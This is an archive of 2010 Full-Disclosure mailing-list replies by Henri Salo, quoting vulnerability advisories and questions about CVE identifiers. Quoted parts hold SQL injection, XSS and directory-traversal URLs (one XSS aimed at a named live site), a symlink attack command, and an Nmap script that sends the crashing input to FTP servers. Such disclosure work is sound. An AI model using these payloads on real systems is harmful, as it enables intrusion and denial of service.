> 11.08.2008 - announced at my site.
> 11.08.2008 - informed admins of web site.
> 11.08.2008 - found others of these vulnerabilities.
> 11.02.2009 - disclosed at my site about first vulnerabilities.
> 05.05.2009 - disclosed at my site about other vulnerabilities.
> 06.05.2009 - informed admins of web site about other vulnerabilities.
> 18.06.2010 - disclosed at my site about vulnerabilities in eSitesBuilder
> (after I found that they concerned with eSitesBuilder).
> 19.06.2010 - informed developers (in case if owners of vulnerable site
> didn't informed them in previous years).
> 
> Seriously, how long can you milk a single XSS here?
> 
> : 2010.10.08 - announced at my site.
> : 2010.10.08 - informed developers.
> : 2010.12.16 - disclosed at my site.
> : 
> : I mentioned about these vulnerabilities at my site
> : (http://websecurity.com.ua/4588/).
> 
> http://websecurity.com.ua/4300/
> 
> Several times, yes you did.

You are wasting your time. Mustlive is a idiot :)

Best regards,
Henri

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Joomla 1.5.21 | Potential SQL Injection Flaws

[Henri Salo]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Fri, 5 Nov 2010 21:41:42 +0800
YGN Ethical Hacker Group  wrote:

> This public disclosure has achieved its aim.
> 
> Joomla! Team finally patched this hole.
> 
> 
> http://developer.joomla.org/security/news/9-security/10-core-security/323-20101101-core-sqli-info-disclosurevulnerabilities.html
> 
> Upgrade to the latest Joomla! version (1.5.22 or later).
> 
> 
> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
> 
> 
> 1. VULNERABILITY DESCRIPTION
> 
> 
> Potential SQL Injection Flaws were detected Joomla! CMS version
> 1.5.20. These flaws were reported along with our Cross Scripting Flaw
> which was fixed in 1.5.21. Developers believed that our reported SQL
> Injection flaws are not fully exploitable because of Joomla! built-in
> string filters and were not fixed in 1.5.21 which is currently the
> latest version.
> 
> 
> 2. PROOF-OF-CONCEPT/EXPLOIT
> 
> http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_(filter_order)_front.jpg
> http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_%28filter_order_Dir%29_front.jpg
> http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_%28filter_order_Dir%29_back.jpg
> 
> 
> 3. DISCLOSURE TIME-LINE
> 
> 
> 2010-10-06  : Notified Joomla! Security Strike Team
> 2010-11-01  : Vulnerability disclosed
> 2010-11-05  : Patched version (1.5.22) released
> 
> 4. VENDOR
> 
> Joomla! Developer Team
> http://www.joomla.org
> http://www.joomla.org/download.html

CVE-2010-4166 can be used when dealing with this issue.

Best regards,
Henri Salo
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkzeXBUACgkQXf6hBi6kbk8fRwCgkvUjPDeZkL1DbwVjHGqfHGV8
oWkAoJ6y34brWQW+S0gEZ8McY0eOye5w
=yn83
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [Bkis-04-2010] Multiple Vulnerabilities in OpenBlog

[Henri Salo]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Mon, 23 Aug 2010 10:36:42 +0700
"Bkis"  wrote:

> [Bkis-04-2010] Multiple Vulnerabilities in OpenBlog
> 
> 1. General Information
> 
> OpenBlog is a free software for developing blogging platform.
> OpenBlog is written on PHP language and available at
> http://www.open-blog.info. In August 2010, Bkis Security discovered
> some XSS, CSRF vulnerabilities on this software; especially, there is
> a vulnerability which might allow privilege elevation on OpenBlog
> 1.2.1. Taking advantage of this vulnerability, hacker might execute
> malicious code on user's browser or even get control of Blog. Bkis
> has sent its warning to the developer.
> 
> Details: http://security.bkis.com/?p=1382
> SVRT Advisory: Bkis-04-2010
> Initial vendor notification: 08/09/2010
> Release Date: 08/23/2010
> Update Date: 08/23/2010
> Discovered by: Duong Manh Linh, Truong Tu Hai, Nguyen Hoang Vinh -
> Bkis Attack Type: Bypass Authentication, XSS, CSRF
> Security Rating: High
> Impact: Code Execution
> Affected Software: Openblog< v1.2.1
> 
> 2. Technical Details
> 
> The most dangerous vulnerability resides on session module of
> OpenBlog. Exploiting this vulnerability, hacker can sign in a normal
> user' account but obtain administrator' privileges. This is due to
> the weakness in user's rights checking and authenticating mechanism,
> resulting in the high possibility of faking administrators'
> privileges.   
> 
> Besides, Bkis also found some XSS and CSRF vulnerabilities on the
> following OpenBlog's functions: 
> 
> XSS holes are found on the following modules: 
> - Create a new post 
> - Edit a post
> - Create a new page
> 
> Because these modules' input variables are not adequately checked and
> filtered, hacker might insert his code into the path's links. If a
> user logins to his Blog and clicks the link, hacker's malicious code
> (JavaScript) will be executed, leading to the loss of user's personal
> information saved on the browser.  
> 
> CSRF vulnerabilities are found on the following modules: 
> - Edit an user
> - Setting
> - Templates
> - Disable/Enable Sidebar  
> - Feed settings
> - Bookmarking
> - New post
> - Edit a post
> - Delete a post
> - New page
> - Edit a page
> - Delete a page
> - New navigation item
> - Edit a navigation item
> - New link
> - Edit a link
> - Delete a link
> - New category
> - Edit a category
> - Delete a category
> - Delete a comment
> - Delete an user
> 
> OpenBlog does not require user's confirmation when performing the
> above functions. Therefore, users might be tricked into performing
> unwanted actions without their consent, like clicking faulty links,
> etc. Specifically, hacker might fool Blog's administrators into
> deleting, editing the posts on the Blog.
> 
> 3. Solution
> 
> Rating the vulnerability as critical, Bkis recommends organizations,
> individuals using OpenBlog be cautious with links of unknown origins.
> At the same time, users should keep themselves updated with the
> developer's information to get timely update.
> 
> 
> --
> Bkis (www.bkis.com)
> Blog (blog.bkis.com)

Do you have CVE-identifier for these vulnerabilities?

Best regards,
Henri Salo
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkxz+OIACgkQXf6hBi6kbk/YUgCfX6TdYIBlXQJe1gSPWZ6Ge/T5
2/oAoLyjKxthFwJXtznB7Eh5xnh/uxK9
=kNMK
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] FuzzDiff tool

[Henri Salo]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Mon, 26 Jul 2010 16:53:28 -0400
Dan Rosenberg  wrote:

> Hello,
> 
> I'd like to announce FuzzDiff, a simple tool to help make crash
> analysis during file format fuzzing a bit easier.  I'm sure many
> people have written similar tools for their own purposes, but I
> haven't seen any that are publicly available.  Hopefully at least one
> person finds it useful.
> 
> When provided with a fuzzed file, a corresponding original un-fuzzed
> file, and the path to the targeted program, FuzzDiff will selectively
> "un-fuzz" portions of the fuzzed file while re-launching the
> application to monitor for crashes.  This will yield a file that still
> crashes the target application, but contains a minimum set of changes
> from the original, un-fuzzed file.  This can be useful in pinning down
> the exact cause of a crash.
> 
> The tool is written in Python and currently only works on Unix-based
> systems, since it monitors for crashes by checking for SIGSEGV.  It
> also assumes that the target program adheres to the syntax "[program]
> [args] [input file]".  Both of these limitations can be easily worked
> around.  The code is hardly what I'd call production-ready, but it
> gets the job done.
> 
> The tool is available at:
> http://vsecurity.com/resources/tool
> 
> Happy hacking,
> Dan Rosenberg

Please open bug-tracker for FuzzDiff and put the program under some
version controlling software.

You have temporary file vulnerability in FuzzDiff
(5b6b5c6c22c1103b4169b9fe6e7bfbc3
c0ce0235f8f0026988c60a3217233c36d829ecdf). Maybe you want to use
this module: http://docs.python.org/library/tempfile.html

Best regards,
Henri Salo
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkxqiQQACgkQXf6hBi6kbk8/7wCgx4m4Wyv6i9GVfc9rNMLatDAW
TQ4An1AqwYBkdJoCJ/7BefGFWXanIfSa
=l+p+
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] SQL Injection vulnerability in CMS WebManager-Pro

[Henri Salo]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Wed, 11 Aug 2010 21:04:51 +0300
"MustLive"  wrote:

> Hello Full-Disclosure!
> 
> I want to warn you about SQL Injection vulnerability in CMS
> WebManager-Pro.
> 
> SQL Injection:
> 
> http://site/index.php?content_id=-1%20or%20version()=4
> 
> Affected software:
> 
> Vulnerable are CMS WebManager-Pro v.7.4.3 (version from FGS_Studio)
> and previous versions. Original version of CMS WebManager-Pro isn't
> vulnerable (there are two different versions of this CMS from
> different developers).
> 
> I mentioned about this vulnerability at my site
> (http://websecurity.com.ua/3576/).
> 
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua

Did you ask for CVE-identifier for this issue? Did you report this to
the developers? You should include more information to your reports.
For example, which version isn't affected if any.

If I am correct this is english-speaking mailing-list so we are not
interested about your www-page when the articles are in a language that
most of us can't read. The page does not seem to include the
information I am looking for.

Best regards,
Henri Salo
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkxj+WMACgkQXf6hBi6kbk/R1gCgwQg6xQUsaW51ugti86wk0i+E
8PoAnRzKoFhX//W0wVH7VFOq23cGmCjQ
=TJCL
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] 2Wire Broadband Router Session Hijacking Vulnerability

[Henri Salo]

On Mon, 9 Aug 2010 23:12:29 +0800
YGN Ethical Hacker Group  wrote:

> ==
> 2Wire Broadband Router Session Hijacking Vulnerability
> ==
> 
> 
> 1. OVERVIEW
> 
> The 2Wire Broadband Router is vulnerable to Session Hijacking flaw
> which attackers can compromise the router administrator session.
> 
> 
> 2. PRODUCT DESCRIPTION
> 
> 2Wire routers, product of 2Wire, are widely-used Broadband routers in
> SOHO environment.
> They are distributed through most famous ISPs (see -
> http://2wire.com/?p=383) with ready-to-use pre-configured settings.
> Their Wireless SSIDs are well-known as "2WIRE" prefix.
> 
> 
> 3. VULNERABILITY DESCRIPTION
> 
> The web-based management interface of 2Wire Broadband router does not
> generate truely unique random session IDs for a logged-in
> administrator user.
> This allows attackers to brute-force guess a valid session ID to
> compromise the administrator session.
> For more information about this kind of weekness,
> refer to CWE-330: Use of Insufficiently Random Values and CWE-331:
> Insufficient Entropy.
> 
> 
> 4. VERSIONS AFFECTED
> 
> Tested against:
> Model: 2700HGV-2 Gateway
> Hardware Version: 2700-100657-005
> Software Version: 5.29.117.3
> 
> Other versions might be affected as well.
> 
> 
> 5. PROOF-OF-CONCEPT/EXPLOIT
> 
> http://yehg.net/lab/pr0js/advisories/2wire/session_analysis/session_tokens_captured_webscarab
> http://yehg.net/lab/pr0js/advisories/2wire/session_analysis/session_tokens_captured_burp
> http://yehg.net/lab/pr0js/advisories/2wire/session_analysis/session_analysis_with_burp.jpg
> http://yehg.net/lab/pr0js/advisories/2wire/session_analysis/session_analysis_with_burp-02.jpg
> http://yehg.net/lab/pr0js/advisories/2wire/session_analysis/session_analysis_with_burp-03.jpg
> http://yehg.net/lab/pr0js/advisories/2wire/session_analysis/session_analysis_with_burp-04.jpg
> 
> 
> 6. IMPACT
> 
> Attackers can compromise 2wire administrator session through automated
> tools and modify any settings they want.
> 
> 
> 7. SOLUTION
> 
> There is no upgrade/patch currently available. 2wire support could not
> estimate when the upgrade is available.
> Also, 2wire users must be aware of other unfixed vulnerabilities
> stated in references section.
> 
> 
> 8. VENDOR
> 
> 2Wire Inc
> http://www.2wire.com
> About 2Wire - http://www.2wire.com/index.php?p=486
> 
> 
> 9. CREDIT
> 
> This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
> Ethical Hacker Group, Myanmar.
> 
> 
> 10. DISCLOSURE TIME-LINE
> 
> 07-25-2010: vulnerability discovered
> 07-29-2010: notified vendor
> 08-02-2010: vendor responded/verified
> 08-09-2010: vendor did not respond when fix/upgrade would be available
> 08-09-2010: vulnerability disclosed
> 
> 
> 11. REFERENCES
> 
> Original Advisory URL:
> http://yehg.net/lab/pr0js/advisories/2wire/[2wire]_session_hijacking_vulnerability
> Other unfixed 2Wire Vulnerabilities: http://www.hakim.ws/
> Related WebGoat Lesson:
> http://yehg.net/lab/pr0js/training/view/owasp/webgoat/WebGoat_SessionMan_SessionHijackingWithJHijack/
> http://jeremiahgrossman.blogspot.com/2008/04/intranet-hack-targeting-at-2wire-dsl.html
> http://www.routerzone.eu/wiki/index.php/Hacking_the_2Wire_1800
> 
> 
> #yehg [08-09-2010]
> 
> 
> -
> Best regards,
> YGN Ethical Hacker Group
> Yangon, Myanmar
> http://yehg.net
> Our Lab | http://yehg.net/lab
> Our Directory | http://yehg.net/hwd

Does this issue have CVE-identifier assigned?

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Information Leakage and Full path disclosure vulnerabilities in WordPress

[Henri Salo]

rbitrary
> file deletion vulnerability (at CSRF-attack on admin) it can be
> bypassed:
> 
> http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=index.php
> 
> Then it'll be no need to guess file name. It'll work in all versions
> of WordPress with this plugin (WP-DB-Backup <= 2.0).
> 
> And if Directory Traversal hole isn't fixed, then it's possible to
> speed up process of finding of the folder with backups (backup-x)
> with help of Arbitrary file deletion vulnerability (at CSRF-attack on
> admin), and to delete index.php in folder wp-content:
> 
> For WordPress <= 2.0.3 (WP-DB-Backup <= 1.7):
> 
> http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../index.php
> 
> If backups are creating regularly (every day), or certainly known the
> date of creating of backup, then it's possible to easily get it.
> Otherwise, it's possible to guess names of backup files. Or it's
> possible to conduct CSRF-attack on admin and create backup, which
> I'll tell about in the next advisory.
> 
> This leakage of information in backup of DB is the most dangerous
> concerning with that there are login and hash of admin in backup.
> Which can be used for gaining access to the site. It was very actual
> before releasing of WordPress 2.5, in which authorization system was
> remade, after Steven Murdoch drew attention of WP developers at
> Cookie Authentication vulnerability in WordPress
> (http://securityvulns.ru/Sdocument460.html). And from version 2.5 in
> WP new authorization method via cookies is using, but even in new
> versions of engine the leakage of backups is still dangerous and it's
> better not to allow it.
> 
> --
> 2. Full path disclosure.
> --
> 
> There are two Full path disclosure vulnerabilities in WP-DB-Backup,
> which appear at appropriate POST requests. They are working only if
> user has appropriate rights (admin in particular).
> 
> http://websecurity.com.ua/uploads/2010/WordPress%20Database%20Backup%20Full%20path%20disclosure.html
> 
> http://websecurity.com.ua/uploads/2010/WordPress%20Database%20Backup%20Full%20path%20disclosure2.html
> 
> Affected products: these vulnerabilities works in plugin WordPress
> Database Backup 2.0 and previous versions in any versions of
> WordPress.
> 
> --
> Protection against these vulnerabilities.
> --
> 
> For protection it's possible to fix these Full path disclosure
> vulnerabilities by yourself (as others FPD in WordPress), or update
> plugin to last version WP-DB-Backup 2.2.2.
> 
> With WordPress 2.0.11 the version 1.8 of plugin is shipped. As I
> checked recently, Full path disclosure and other vulnerabilities were
> fixed in version 2.1 of the plugin. So the last version of the plugin
> WordPress Database Backup 2.2.2 isn't vulnerable to CSRF and Full
> path disclosure (and isn't vulnerable to above-mentioned Directory
> Traversal, Arbitrary file deletion, DoS and XSS
> (http://websecurity.com.ua/1676/)). But the last version of the
> plugin is still vulnerable to Information Leakage.
> 
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua 

Have you contacted WordPress and/or requested CVE-identifiers for these
issues?

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] WAF fail

[Henri Salo]

WAF fail;

http://www.1filesharing.com/search_rapidshare/index.php?q=%22%27%3E%3Cscript%3Ealert%281%29;%3C/script%3Ei&fl=all&source=

1filesharing.com does not reply to abuse-emails and won't delete files
even I have requested it. I have four different malware-links still
spreading using that service.

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Someone using Wikipedia to infect others

[Henri Salo]

On Thu, 1 Jul 2010 14:36:40 +0300
Henri Salo  wrote:

> Original email attached. Analysis of the malisious URL:
> 
> http://wepawet.iseclab.org/view.php?hash=ea568f176830f3151538ce46a1182be9&t=1277983472&type=js
> 
> Best regards,
> Henri Salo

Few people told me privately to look at the headers. I understand this
email did not coming from Wikipedia, but they should definately react on
tihs case. Organization like that should know several security contacts.
Wikipedia (and others) should try to get that spammer AND the site
hosting the malicious content out of the Internet.

---
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Someone using Wikipedia to infect others

[Henri Salo]

Original email attached. Analysis of the malisious URL:

http://wepawet.iseclab.org/view.php?hash=ea568f176830f3151538ce46a1182be9&t=1277983472&type=js

Best regards,
Henri Salo

Wikipedia e-mail address confirmation
Description: Binary data
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Fw: [irc-security] UnrealIRCd 3.2.8.1 backdoored on official ftp and site

[Henri Salo]

Begin forwarded message:

Date: Sat, 12 Jun 2010 16:14:25 +0200
From: satmd 
To: IRC Security Discussion List 
Subject: [irc-security] UnrealIRCd 3.2.8.1 backdoored on official ftp
and site


Hello folks,

I'd like to let you know that there's been a compromise of the 
unrealircd website and ftp and the 3.2.8.1 tarball release had been 
replaced by a backdoored copy.

I'm attaching Syzops original security advisory from 
http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt

Yours,
satmd
UnrealIRCd support staff

Hi all,

This is very embarrassing...

We found out that the Unreal3.2.8.1.tar.gz file on our mirrors has been
replaced quite a while ago with a version with a backdoor (trojan) in
it. This backdoor allows a person to execute ANY command with the
privileges of the user running the ircd. The backdoor can be executed
regardless of any user
restrictions (so even if you have passworded server or hub that doesn't 
allow
any users in).

It appears the replacement of the .tar.gz occurred in November 2009 (at 
least on some mirrors). It seems nobody noticed it until now.

Obviously, this is a very serious issue, and we're taking precautions
so this will never happen again, and if it somehow does that it will be 
noticed quickly.
We will also re-implement PGP/GPG signing of releases. Even though in 
practice
(very) few people verify files, it will still be useful for those
people who do.

Safe versions
==

The Windows (SSL and non-ssl) versions are NOT affected.

CVS is also not affected.

3.2.8 and any earlier versions are not affected.

Any Unreal3.2.8.1.tar.gz downloaded BEFORE November 10 2009 should be 
safe, but you should really double-check, see next.

How to check if you're running the backdoored version
==
Two ways:

One is to check if the Unreal3.2.8.1.tar.gz you have is good or bad by 
running 'md5sum Unreal3.2.8.1.tar.gz' on it.
Backdoored version (BAD) is: 752e46f2d873c1679fa99de3f52a274d
Official version (GOOD) is: 7b741e94e867c0a7370553fd01506c66

The other way is to run this command in your Unreal3.2 directory:
grep DEBUG3_DOLOG_SYSTEM include/struct.h
If it outputs two lines, then you're running the backdoored/trojanized 
version.
If it outputs nothing, then you're safe and there's nothing to do.

What to do if you're running the backdoored version

Obviously, you only need to do this if you checked you are indeed 
running the
backdoored version, as mentioned above. Otherwise there's no point in 
continuing, as the version on our website is (now back) the good one 
from April 13 2009 and nothing 'new'.

Solution:
* Re-download from http://www.unrealircd.com/
* Verify MD5 (or SHA1) checksums, see next section (!)
* Recompile and restart UnrealIRCd

The backdoor is in the core, it is not possible to 'clean' UnrealIRCd 
without
a restart or through a module.

How to verify that the release is the official version
===
You can check by running 'md5sum Unreal3.2.8.1.tar.gz', it should
output: 7b741e94e867c0a7370553fd01506c66  Unreal3.2.8.1.tar.gz

For reference, here are the md5sums for ALL proper files:
7b741e94e867c0a7370553fd01506c66  Unreal3.2.8.1.tar.gz
5a6941385cd04f19d9f4241e5c912d18  Unreal3.2.8.1.exe
a54eafa6861b6219f4f28451450cdbd3  Unreal3.2.8.1-SSL.exe

These are the EXACT same MD5sums as mentioned on April 13 2009 in the 
initial 3.2.8.1 announcement to the unreal-notify and unreal-users 
mailing list.


Finally

Again, I would like to apologize about this security breach.
We simply did not notice, but should have.
We did not check the files on all mirrors regularly, but should have.
We did not sign releases through PGP/GPG, but should have done so.

This advisory (and updates to it, if any) is posted to:
http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Virii in the wild

[Henri Salo]

> http: //ecard-gre etings-com.googlegrou ps.com/web/ecard.zip
> 
> 8e4830ee84783c6fd17d4475cd1120f0  ecard.zip
> ba8e39a695ea84767adb0b90f5973332  ecard.exe
> 75adc566ab7ee7fc06c19c01413ddb13c090406b  ecard.zip
> 73383ca43fc98fbba5d1358bebfeb9e09864d306  ecard.exe
> 0bdb420658f31cadad291ae497066e8f9227166a02976a548cdb5c57  ecard.zip
> 9a995e18175cedcdb5c041fc96bd71cf6202b8534348664ccae179a9  ecard.exe
> 
> ae875123e2325a54249974eaf425697a  PC_protect.exe
> 411329f5eee7b35494e05d23919122671251343b  PC_protect.exe
> f8d1df776592d7159be5ece59059a9fa76c47cf511dd49ed642cd5ac
> PC_protect.exe
> 
> ecard.exe: OK
> ecard.zip: OK
> PC_protect.exe: OK
> 
> --- SCAN SUMMARY ---
> Known viruses: 798905
> Engine version: 0.96
> Scanned directories: 0
> Scanned files: 3
> Infected files: 0
> Data scanned: 1.45 MB
> Data read: 1.45 MB (ratio 1.00:1)
> Time: 2.815 sec (0 m 2 s)
> 
> https://anubis.iseclab.org/?action=result&task_id=1d65344c1a22298d4c91244f24710205c
> https://anubis.iseclab.org/?action=result&task_id=14865c640caefc854815769e2262e7297
> 
> I already reported this to ClamAV. Contact me if you want the
> binaries.

I also reported this to F-Secure and AVG.

http://www.virustotal.com/analisis/b1d265068e42add36d161de63abcd09d461ba7598bc7bf2187843bcfb1db2e2a-1275679442
http://www.virustotal.com/analisis/8a0d55265395aa8d947d012de267c808e9432d0c218e35210d735f2dd49bae86-1275679472
http://virusscan.jotti.org/en/scanresult/e09e3c7d2a494edc53cc43005ab60c27fde134f7
http://virusscan.jotti.org/en/scanresult/548e8b7a6995c70f3c79dcafbc33cd1d8ea0d3ef

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Virii in the wild

[Henri Salo]

http: //ecard-gre etings-com.googlegrou ps.com/web/ecard.zip

8e4830ee84783c6fd17d4475cd1120f0  ecard.zip
ba8e39a695ea84767adb0b90f5973332  ecard.exe
75adc566ab7ee7fc06c19c01413ddb13c090406b  ecard.zip
73383ca43fc98fbba5d1358bebfeb9e09864d306  ecard.exe
0bdb420658f31cadad291ae497066e8f9227166a02976a548cdb5c57  ecard.zip
9a995e18175cedcdb5c041fc96bd71cf6202b8534348664ccae179a9  ecard.exe

ae875123e2325a54249974eaf425697a  PC_protect.exe
411329f5eee7b35494e05d23919122671251343b  PC_protect.exe
f8d1df776592d7159be5ece59059a9fa76c47cf511dd49ed642cd5ac  PC_protect.exe

ecard.exe: OK
ecard.zip: OK
PC_protect.exe: OK

--- SCAN SUMMARY ---
Known viruses: 798905
Engine version: 0.96
Scanned directories: 0
Scanned files: 3
Infected files: 0
Data scanned: 1.45 MB
Data read: 1.45 MB (ratio 1.00:1)
Time: 2.815 sec (0 m 2 s)

https://anubis.iseclab.org/?action=result&task_id=1d65344c1a22298d4c91244f24710205c
https://anubis.iseclab.org/?action=result&task_id=14865c640caefc854815769e2262e7297

I already reported this to ClamAV. Contact me if you want the binaries.


Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [Tool]spiderpig --a pdf javascript fuzzer in python

[Henri Salo]

On Thu, 3 Jun 2010 16:11:32 +0530
Sachin Shinde  wrote:

> I would like 2 share my new tool spiderpig .
> 
> its a pdf javascript fuzzer which targets only javascript engine of
> reader.
> 
> I know javascript is out and swf are in but still javascript exploits
> will be threat unless reader disables it by default :)
> 
> 
> you can download it from
> http://code.google.com/p/spiderpig-pdffuzzer/
> 
> and for more information see my blog which is here
> http://cons0ul.wordpress.com/
> 
> comments are most welcome !!
> regards,
> cons0ul

Why don't you have the code in SVN-repository?

---
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ftp-libopie.nse in response to CVE-2010-1938

[Henri Salo]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


A vulnerability that has been published today affects the OPIE
Authentication System (libopie).
According to the researchers it could hit many systems like

- - OpenSuSE
- - wu-ftpd
- - mod_opie
- - PAM
- - openssh (modified by FreeBSD/DragonflyBSD Team)
- - sudo
- - opiesu
- - popper
- - Probably much more...

Original advisory :
http://securityreason.com/achievement_securityalert/87 See also :
http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc

Please find attached their PoC as a script for Nmap.
Example Output :
- -- PORT   STATE SERVICE
- -- 21/tcp open  ftp
- -- | ftp-libopie: Likely prone to CVE-2010-1938 (OPIE off-by-one stack
overflow)
- -- |_See
http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc

A.G.


-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.12 (GNU/Linux)
Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org/

iEYEARECAAYFAkv+rS8ACgkQ3aDTTO0ha7j4igCffydmk9Y+U6ocVSNI5RwopoGh
vc0AniRSZZEkW5vgImS4czZsTTzS1bqf
=No6K
-END PGP SIGNATURE-

description = [[
Checks if an FTPd is prone to CVE-2010-1938 (OPIE off-by-one stack overflow).
Vulnerability discovered by Maksymilian Arciemowicz and Adam 'pi3' Zabrocki

]]
   
---
-- @output
-- PORT   STATE SERVICE
-- 21/tcp open  ftp
-- | ftp-libopie: Likely prone to CVE-2010-1938 (OPIE off-by-one stack overflow)
-- |_See http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc

   
author = "Ange Gutek"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html";
categories = {"intrusive"}
   
require "shortport"
   
portrule = shortport.port_or_service(21, "ftp")
   

action = function(host, port)
local socket = nmap.new_socket()
local result
-- If we use more that 31 chars for username, ftpd will crash (quoted from the 
advisory).
local user_account = "AAA"
local status = true

local err_catch = function()
socket:close()
end

local try = nmap.new_try(err_catch)

socket:set_timeout(1)
try(socket:connect(host.ip, port.number, port.protocol))

-- First, try a safe User so that we are sure that everything is ok
local payload = "USER opie\r\n"
try(socket:send(payload))

status, result = socket:receive_lines(1);
if status and not (string.match(result,"^421")) then
  
  -- Second, try the vulnerable user account
  local payload = "USER " .. user_account .. "\r\n"
  try(socket:send(payload))

  status, result = socket:receive_lines(1);
  if status then
return
  else
  -- if the server does not answer anymore we may have reached a stack 
overflow condition
  return "Likely prone to CVE-2010-1938 (OPIE off-by-one stack 
overflow)\nSee http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc";
  end
else
return
end

socket:close()

end
___
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Mathematica on Linux /tmp/MathLink vulnerability

[Henri Salo]

On Fri, 14 May 2010 11:56:10 +1000
paul.sz...@sydney.edu.au wrote:

> "If you're doing anything technical, think Mathematica --..."
>   http://www.wolfram.com/products/mathematica/index.html
> 
> Mathematica7 on Linux uses the /tmp/MathLink directory in insecure
> ways. Mathematica creates or re-uses an existing /tmp/MathLink
> directory, and overwrites files within and follows symlinks. This
> type of behaviour is "known unsafe" on multi-user machines e.g.
> University login servers. As a classic example of a symlink attack,
> if an "attacker" uses:
> 
>   mkdir /tmp/MathLink; ln -s /home/victim/.bashrc /tmp/MathLink/.gshmm
> 
> then when the victim runs Mathematica his ~/.bashrc will be clobbered.
> New files are created world-writable, allowing a complete compromise
> of the user account by linking to ~/.bash_logout . (If root ever uses
> Mathematica then the damage is greater.)
> 
> Mathematica uses also /tmp/fonts$$.conf in insecure ways.
> 
> Workaround: use command-line math instead of pretty interface.
> 
> Notified supp...@wolfram.com on 7 May 2010, was assigned [TS 16194].
> 
> Cheers,
> 
> Paul Szabo   p...@maths.usyd.edu.au
> http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and
> Statistics   University of SydneyAustralia

Have you requested CVE-identifier for this?

---
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] XSS in Drupal Better Formats Module

[Henri Salo]

On Tue, 27 Apr 2010 12:07:17 -0400
"Justin C. Klein Keane"  wrote:

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> Description of Vulnerability:
> - -
